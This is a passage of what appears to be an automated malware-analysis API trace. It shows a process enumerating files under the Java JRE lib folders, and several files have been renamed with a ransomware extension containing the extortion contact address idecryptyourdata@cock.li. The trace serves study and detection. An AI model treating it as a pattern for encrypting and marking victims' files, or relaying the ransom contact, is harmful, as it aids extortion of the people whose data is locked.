dwReserved1=0x2e0000, cFileName="sRGB.pf", cAlternateFileName="")) returned 0 [0179.403] FindClose (in: hFindFile=0x43a2dd8 | out: hFindFile=0x43a2dd8) returned 1 [0179.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.404] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-types.properties", cAlternateFileName="CONTEN~1.PRO")) returned 1 [0179.404] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x101a, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.data", cAlternateFileName="CURREN~1.DAT")) returned 1 [0179.404] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploy", cAlternateFileName="")) returned 1 [0179.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.404] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a3018 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33d2eca, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x33d2eca, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x3464e04, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x383a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ffjcext.zip.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="FFJCEX~1.BAT")) returned 1 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xb2c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages.properties", cAlternateFileName="MESSAG~1.PRO")) returned 1 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcea, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_de.properties", cAlternateFileName="MESSAG~2.PRO")) returned 1 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe10, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_es.properties", cAlternateFileName="MESSAG~3.PRO")) returned 1 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_fr.properties", cAlternateFileName="MESSAG~4.PRO")) returned 1 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc97, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_it.properties", cAlternateFileName="MEC9EA~1.PRO")) returned 1 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x18cd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_ja.properties", cAlternateFileName="ME4AF1~1.PRO")) returned 1 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1650, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_ko.properties", cAlternateFileName="ME1706~1.PRO")) returned 1 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcd5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_pt_BR.properties", cAlternateFileName="MED1E1~1.PRO")) returned 1 [0179.587] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_sv.properties", cAlternateFileName="ME0541~1.PRO")) returned 1 [0179.588] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfe8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_zh_CN.properties", cAlternateFileName="ME40CD~1.PRO")) returned 1 [0179.588] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xea8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_zh_HK.properties", cAlternateFileName="MEB8B5~1.PRO")) returned 1 [0179.588] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xea8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="messages_zh_TW.properties", cAlternateFileName="MECC18~1.PRO")) returned 1 [0179.588] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f17bd, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x33f17bd, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x3417a27, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x2278, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="splash.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SPLASH~1.BAT")) returned 1 [0179.588] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f17bd, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x33f17bd, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x3417a27, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x3c9e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="splash@2x.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SPLASH~2.BAT")) returned 1 [0179.588] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f17bd, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x33f17bd, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x348a23a, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x1f76, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="splash_11-lic.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SPLASH~3.BAT")) returned 1 [0179.588] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3417a27, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x3417a27, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x34b0407, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x30dc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="splash_11@2x-lic.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SPLASH~4.BAT")) returned 1 [0179.588] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3417a27, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x3417a27, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x34b0407, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x30dc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="splash_11@2x-lic.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SPLASH~4.BAT")) returned 0 [0179.588] FindClose (in: hFindFile=0x43a3018 | out: hFindFile=0x43a3018) returned 1 [0179.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.588] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ed9405, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8ed9405, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa900a6f7, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ce7de, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploy.jar", cAlternateFileName="")) returned 1 [0179.589] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa11bdb26, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa8ed01b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ext", cAlternateFileName="")) returned 1 [0179.589] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.589] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa11bdb26, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa8ed01b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2d58 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa11bdb26, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa8ed01b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2de78, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="access-bridge-64.jar", cAlternateFileName="ACCESS~1.JAR")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3ae816, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cldrdata.jar", cAlternateFileName="")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x205e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dnsns.jar", cAlternateFileName="")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xade4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jaccess.jar", cAlternateFileName="")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1166a99, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jfxrt.jar", cAlternateFileName="")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa8546b2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa8546b2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa8ed01b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21a46d, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="localedata.jar", cAlternateFileName="LOCALE~1.JAR")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5b5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="meta-index", cAlternateFileName="META-I~1")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1edd4e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nashorn.jar", cAlternateFileName="")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa4c9, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sunec.jar", cAlternateFileName="")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x44661, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sunjce_provider.jar", cAlternateFileName="SUNJCE~1.JAR")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7fbb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sunmscapi.jar", cAlternateFileName="SUNMSC~1.JAR")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3d5bf, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sunpkcs11.jar", cAlternateFileName="SUNPKC~1.JAR")) returned 1 [0179.590] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10d3c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zipfs.jar", cAlternateFileName="")) returned 1 [0179.591] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10d3c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zipfs.jar", cAlternateFileName="")) returned 0 [0179.591] FindClose (in: hFindFile=0x43a2d58 | out: hFindFile=0x43a2d58) returned 1 [0179.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.591] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="flavormap.properties", cAlternateFileName="FLAVOR~1.PRO")) returned 1 [0179.591] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xeba, dwReserved0=0x0, dwReserved1=0x0, cFileName="fontconfig.bfc", cAlternateFileName="FONTCO~1.BFC")) returned 1 [0179.592] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2948, 